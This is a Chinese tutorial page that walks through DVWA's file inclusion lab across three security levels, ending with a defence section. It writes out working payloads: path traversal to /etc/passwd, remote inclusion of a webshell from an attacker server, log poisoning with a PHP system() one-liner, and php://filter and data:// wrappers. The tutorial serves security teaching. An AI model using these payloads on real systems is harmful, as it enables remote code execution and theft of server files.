当前位置: 首页 > article >正文

DVWA文件包含漏洞实战:从allow_url_include配置到GetShell全流程解析

DVWA文件包含漏洞实战从环境配置到攻击防御全解析漏洞原理与靶场环境搭建文件包含漏洞是Web安全领域常见的高危漏洞之一它允许攻击者通过动态文件包含机制读取敏感文件或执行任意代码。在PHP开发中include、require等函数的不当使用是导致该漏洞的主要原因。漏洞核心机制当开发者使用变量动态包含文件时若未对用户输入进行严格过滤攻击者就能控制包含的文件路径。根据包含文件的来源可分为两种类型本地文件包含(LFI)包含服务器本地的文件远程文件包含(RFI)通过HTTP/FTP等协议包含远程服务器上的文件在DVWA靶场中文件包含模块默认会提示The PHP function allow_url_include is not enabled这是因为PHP的安全配置限制了远程文件包含功能。要启用完整功能需修改php.ini中的两个关键参数allow_url_include On allow_url_fopen On修改后需重启Web服务使配置生效。值得注意的是在生产环境中开启这些选项会显著增加安全风险靶场环境仅为教学目的而配置。基础漏洞利用实战Low安全级别无防护的包含漏洞在DVWA的Low安全级别下代码直接使用用户输入的page参数进行文件包含没有任何过滤措施$file $_GET[page];这种实现方式极其危险攻击者可以读取系统敏感文件如/etc/passwd包含远程恶意脚本执行任意代码通过路径遍历访问Web目录外的文件典型攻击示例# 本地文件包含 http://靶场地址/vulnerabilities/fi/?page../../../../etc/passwd # 远程文件包含 http://靶场地址/vulnerabilities/fi/?pagehttp://攻击者服务器/shell.txt提示在实际渗透测试中成功利用RFI通常能直接获取服务器权限是最危险的Web漏洞之一Medium安全级别基础过滤与绕过Medium级别增加了简单的过滤机制$file str_replace(array(http://, https://), , $file); $file str_replace(array(../, ..\\), , $file);这种过滤可通过以下方式绕过双写绕过hthttp://tp://attacker.com/shell.txt → 过滤后变为http://attacker.com/shell.txt大小写混淆HtTp://或HTTP://可能绕过简单的大小写敏感过滤使用其他协议如ftp://、php://等未被过滤的协议有效Payload示例# 双写绕过路径遍历 http://靶场地址/vulnerabilities/fi/?page....//....//etc/passwd # 大小写混淆远程包含 http://靶场地址/vulnerabilities/fi/?pageHtTp://attacker.com/shell.txt高级攻击技术与防御绕过High安全级别严格的文件名限制High级别采用了更严格的限制只允许包含以file开头的文件if(!fnmatch(file*, $file) $file ! include.php) { echo ERROR: File not found!; exit; }这种情况下攻击者可以利用file协议读取本地文件file:///etc/passwd结合已知文件路径进行目录遍历file1.php../../../../etc/passwd高级利用技巧# 使用file协议读取配置文件 http://靶场地址/vulnerabilities/fi/?pagefile:///etc/passwd # 日志文件注入攻击需知道日志路径 1. 访问包含PHP代码的URL?php system($_GET[cmd]);? 2. 包含日志文件执行代码?page../../var/log/apache2/access.logcmdid伪协议利用技术PHP支持多种伪协议在文件包含漏洞中特别有用协议用途示例php://input执行POST数据中的代码需同时发送POST请求体php://filter读取文件源码Base64编码php://filter/convert.base64-encode/resourceconfig.phpdata://直接包含Base64编码的数据data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8伪协议攻击示例# 使用php://filter读取配置文件源码 http://靶场地址/vulnerabilities/fi/?pagephp://filter/convert.base64-encode/resourceindex.php # 使用data://直接执行代码 http://靶场地址/vulnerabilities/fi/?pagedata://text/plain,?php system(id);?防御方案与最佳实践多层级防御策略输入验证层使用白名单严格限制可包含的文件过滤所有特殊字符../, ://等验证文件扩展名和路径配置加固层allow_url_include Off allow_url_fopen Off open_basedir /var/www/html代码设计层避免动态包含用户可控的文件使用固定文件映射代替直接变量包含实现文件完整性校验机制安全代码示例不安全实现$page $_GET[page]; include($page);安全实现$allowed [home.php, about.php, contact.php]; $page $_GET[page]; if(in_array($page, $allowed)) { include($page); } else { include(404.php); }漏洞利用的实战案例案例1通过文件包含获取WebShell准备一个包含WebShell代码的文本文件shell.txt?php system($_GET[cmd]);?在攻击者服务器上启动HTTP服务python3 -m http.server 80通过RFI包含远程文件http://靶场地址/vulnerabilities/fi/?pagehttp://攻击者IP/shell.txt?cmdid案例2日志注入攻击确定Web服务器日志路径如/var/log/apache2/access.log发送包含PHP代码的请求curl -A ?php system($_GET[cmd]);? http://靶场地址/包含日志文件执行代码http://靶场地址/vulnerabilities/fi/?page../../var/log/apache2/access.logcmdid生产环境防护建议最小权限原则Web服务器以低权限用户运行限制PHP可访问的目录open_basedir定期审计文件权限深度防御措施部署WAF拦截包含攻击特征请求启用PHP安全模式safe_mode配置SELinux/AppArmor限制Web进程行为持续监控监控异常文件包含行为审计包含的文件路径记录并分析包含失败的尝试文件包含漏洞的危害不容小觑从简单的信息泄露到完整的系统沦陷都可能发生。通过DVWA靶场的实践我们可以深入理解漏洞原理、掌握多种利用技术并学习如何构建有效的防御体系。

相关文章:

DVWA文件包含漏洞实战:从allow_url_include配置到GetShell全流程解析

DVWA文件包含漏洞实战:从环境配置到攻击防御全解析 漏洞原理与靶场环境搭建 文件包含漏洞是Web安全领域常见的高危漏洞之一,它允许攻击者通过动态文件包含机制读取敏感文件或执行任意代码。在PHP开发中,include、require等函数的不当使用是导…...

【Java面试必考】面向对象核心:三大特性、抽象类与接口、重写与重载详解

1. 面向对象三大特性(背诵版) 封装(Encapsulation):隐藏对象的属性和实现细节,仅对外公开接口。 通俗解释:就像ATM机,你只需要知道怎么插卡、输入密码、取钱(对外暴露的方…...

RimWorld Mod开发避坑指南:从零开始配置.NET 4.7.2环境到生成dll

RimWorld Mod开发实战指南:从环境搭建到高效调试的全流程解析 在星际殖民模拟游戏RimWorld的创意工坊中,超过5万个玩家自制Mod构成了这个沙盒游戏最迷人的生态。当你在Steam创意工坊点击"订阅"按钮时,是否曾好奇这些改变游戏规则的…...

Reflexion框架解析:如何通过语言反馈实现LLM Agent的自我强化

1. 什么是Reflexion框架? 想象一下你在玩一个解谜游戏,第一次尝试失败后,系统不是简单显示"Game Over",而是用文字详细告诉你:"刚才在第三关应该先拿蓝色钥匙再开门"。这种自然语言反馈就是Reflex…...

Astrofox:如何用3个步骤将音频变成惊艳的视觉盛宴

Astrofox:如何用3个步骤将音频变成惊艳的视觉盛宴 【免费下载链接】astrofox Astrofox is a motion graphics program that lets you turn audio into amazing videos. 项目地址: https://gitcode.com/gh_mirrors/as/astrofox 想象一下,你最喜欢的…...

电力负荷预测数据集盘点:从单站到多区域的实战资源指南

1. 电力负荷预测数据集的重要性与选型原则 电力负荷预测是能源管理系统的核心环节,无论是电网调度、电力市场交易还是新能源消纳,都离不开精准的负荷预测。我在实际项目中发现,选对数据集往往比算法调参更重要——就像做饭时食材新鲜度决定菜…...

三菱fx5u PLC螺丝机项目全套程序(含威纶触摸屏与三菱伺服电机控制)

三菱fx5u plc螺丝机项目整套程序(含触摸屏程序) 程序注释全面,用的三菱fx5u系列plc和威纶触摸屏、三菱伺服电机。 文件包括plc程序、触摸屏程序、电气图、IO地址分配表、电气BOM表、伺服参数配置,本程序已设备上成熟生产。 自己辛…...

Swin2SR跨平台支持:移动端集成的技术挑战与方案

Swin2SR跨平台支持:移动端集成的技术挑战与方案 1. 移动端超分技术的核心价值 在移动互联网时代,用户对图像质量的要求越来越高。无论是社交分享、电商展示还是内容创作,高清图像都成为基本需求。然而移动设备受限于网络条件、存储空间和计…...

DeepChat跨平台部署指南:从环境诊断到生产构建的全流程实践

DeepChat跨平台部署指南:从环境诊断到生产构建的全流程实践 【免费下载链接】deepchat DeepChat - 连接强大AI与个人世界的智能助手 | DeepChat - A smart assistant that connects powerful AI to your personal world 项目地址: https://gitcode.com/GitHub_Tre…...

php方案 PHP的数据库Schema版本管理

用 https://github.com/cakephp/phinx,框架无关,最常用。composer require robmorgan/phinx配置// phinx.php(放项目根目录)return [paths > [migrations > db/migrations],environments > [default_environment > de…...

从图形学到机械臂控制:如何用Bresenham算法实现3轴机械臂的直线插补(附Processing代码)

从图形学到机械臂控制:Bresenham算法在3轴机械臂直线插补中的实战应用 当我在工作室第一次尝试让机械臂画出完美直线时,电机发出的咔嗒声和纸上歪歪扭扭的轨迹形成了鲜明对比。这让我意识到,将图形学算法移植到物理世界需要跨越理论到实践的鸿…...

RetinaFace人脸检测实战:从镜像部署到批量图片处理的完整流程

RetinaFace人脸检测实战:从镜像部署到批量图片处理的完整流程 1. 项目概述与准备工作 RetinaFace作为当前最先进的人脸检测算法之一,以其高精度和鲁棒性著称。本教程将带你从零开始,完成RetinaFace镜像的部署与使用,最终实现批量…...

实测7天!2026年AI工具红黑榜:90%程序员都在交智商税,谁在封神谁在割韭菜?

大家好,我是一名长期混迹 CSDN 的前端开发兼内容创作者,日常写代码、做毕设、写博客、做 PPT、整理会议纪要。过去半个月我把2026 年全网最火、争议最大的 AI 工具全部拉满实测,从免费额度用到付费会员,覆盖写作、代码、长文档、办…...

LaTeX科技论文写作:深度学习实验结果可视化技巧

LaTeX科技论文写作:深度学习实验结果可视化技巧 论文图表的质量直接影响审稿人对研究成果的第一印象,好的可视化能让复杂数据一目了然。 1. 为什么LaTeX是深度学习论文的首选 写深度学习论文最头疼的就是处理那些复杂的实验结果。模型性能对比、损失曲线…...

永磁同步电机坐标变换:从静止到旋转的数学解析

1. 永磁同步电机坐标变换的物理意义 第一次接触永磁同步电机控制时,我被各种坐标系搞得晕头转向。静止坐标系、旋转坐标系、αβ坐标系、dq坐标系...这些概念就像一团乱麻。直到有一天,我盯着电机转子旋转时突然明白:坐标变换的本质就是换个角…...

ERNIE-4.5-0.3B-PT效果惊艳:Chainlit中数学推理题分步解答与验证过程

ERNIE-4.5-0.3B-PT效果惊艳:Chainlit中数学推理题分步解答与验证过程 1. 为什么这个小模型能答对初中数学压轴题? 你可能见过动辄几十GB的“大”模型,但今天要聊的这个——ERNIE-4.5-0.3B-PT,参数量只有3亿,部署在单…...

H5移动端安全区适配实战:解决iOS与Android全面屏布局难题

1. 全面屏时代的安全区适配挑战 第一次在iPhone X上测试H5页面时,我遇到了一个尴尬的问题——页面顶部的返回按钮被"刘海"遮住了大半。这个看似简单的布局问题,背后其实是全面屏设备带来的安全区适配难题。随着手机屏幕从传统的16:9发展到现在…...

避坑指南:Xinference-v1.17.1在Jupyter中常见问题解决,小白也能轻松上手

避坑指南:Xinference-v1.17.1在Jupyter中常见问题解决,小白也能轻松上手 1. 准备工作与环境检查 1.1 确认镜像正确加载 在CSDN星图镜像广场启动xinference-v1.17.1镜像后,首先需要确认环境是否正常。打开Jupyter Notebook,在第…...

双2080Ti加持:Ubuntu下vllm与openweb-ui高效部署DeepSeek-R1实战

1. 为什么选择双2080Ti部署DeepSeek-R1? 最近在帮客户搭建AI问答系统时,发现很多团队都在寻找性价比高的推理方案。经过多次实测,我发现两张二手2080Ti显卡组成的计算单元,完全能够流畅运行7B参数的DeepSeek-R1模型。这套方案特别…...

C#与Sql Server 2008 R2图书信息管理系统源码解析:基于VS2015与.NET...

C#与Sql server 2008 R2图书信息管理系统,源码带注释,VS2015版本,.net4.5框架最近在整理硬盘翻出个古董项目——基于C#和SQL Server 2008 R2的图书管理系统。虽然技术栈有点年头,但架构设计现在看依然有参考价值。随手打开尘封的V…...

今天发现p1108里面被小孩子塞了饼干进去,我都不知道——但是为何打印机经常出现随机中断——有时候还多打印——页面还出现竖向条纹,这个到底什么原因?-是不是打印机坏了?需要修吗?

今天发现p1108里面被小孩子塞了饼干进去,我都不知道——但是为何打印机经常出现随机中断——有时候还多打印——页面还出现竖向条纹,这个到底什么原因?-是不是打印机坏了?需要修吗?...

昇腾 910B 多机部署 DeepSeek-V3/R1 671B 满血版:从零到一的实战避坑指南

1. 开篇:为什么你需要这份“避坑”指南? 最近,我身边好几个团队都拿到了昇腾 910B 的服务器,摩拳擦掌地想部署那个“庞然大物”——DeepSeek-V3/R1 671B 满血版。结果呢?十有八九都卡在了多机部署这个环节。不是网络不…...

根据所提供的文字范围,一个合适的标题可以是:“MATLAB仿真:复现耗散孤子共振DSR及金兹堡...

MATLAB仿真复现耗散孤子共振DSR 根据谱方法求解复立方五次方金兹堡朗道方程 获得光纤激光器中耗散孤子的演化过程耗散孤子共振光纤激光器仿真平台:从 Ginzburg-Landau 方程到多维度脉冲演化分析—— 一套可扩展、可配置、可动画的 MATLAB 谱方法框架一、背景与需求高…...

标点恢复不靠猜!SenseVoice-Small ONNX集成CT-Transformer实操详解

标点恢复不靠猜!SenseVoice-Small ONNX集成CT-Transformer实操详解 还在为语音识别结果没有标点符号而头疼吗?SenseVoice-Small ONNX CT-Transformer组合,让你的语音转文字结果自动拥有完美的标点符号! 1. 项目简介:轻…...

ViT中的Patch Embedding:从图像分割到向量映射的完整代码解析(PyTorch版)

ViT中的Patch Embedding:从图像分割到向量映射的完整代码解析(PyTorch版) 当计算机视觉遇上Transformer架构,一场革命悄然发生。传统卷积神经网络(CNN)长期统治的视觉领域,如今被Vision Transfo…...

Qwen-Image-2512-Pixel-Art-LoRA 模型v1.0 建筑与室内设计:生成等轴视角像素风格设计草图

Qwen-Image-2512-Pixel-Art-LoRA 模型v1.0 建筑与室内设计:生成等轴视角像素风格设计草图 最近在尝试用AI辅助设计时,我发现了一个挺有意思的玩法:用像素风格来快速勾勒建筑和室内设计的草图。这听起来可能有点复古,但实际效果却…...

【图神经网络】DGL实战:异构图神经网络在推荐系统中的应用

1. 异构图神经网络与推荐系统的天然契合 推荐系统本质上是一个信息匹配游戏——把用户和商品这两个不同维度的实体连接起来。传统矩阵分解方法把用户和商品强行塞进同一个向量空间,就像用同一把尺子测量身高和体重,虽然能得出数值,但缺乏物理…...

opencode保险科技:精算模型AI编程辅助实践

OpenCode保险科技:精算模型AI编程辅助实践 引言 在保险科技领域,精算模型的开发与维护是一项高度复杂且专业的工作。从风险定价、准备金评估到偿付能力测算,每一行代码都承载着巨大的业务价值与合规风险。传统的开发模式中,精算…...

nodejs+vue基于springboot的广东省家庭亲子旅游接待信息定制 餐饮购票

目录技术栈选择后端实现前端开发关键功能实现部署方案数据安全特色功能开发项目技术支持可定制开发之功能创新亮点源码获取详细视频演示 :文章底部获取博主联系方式!同行可合作技术栈选择 后端采用Spring Boot框架,提供RESTful API接口。前端…...

nodejs+vue基于springboot的巨会玩剧本杀服务平台管理系统

目录技术栈选择系统模块划分数据库设计关键API示例(Spring Boot)前端交互示例(Vue Axios)实时通信方案部署架构测试策略项目里程碑项目技术支持可定制开发之功能创新亮点源码获取详细视频演示 :文章底部获取博主联系方…...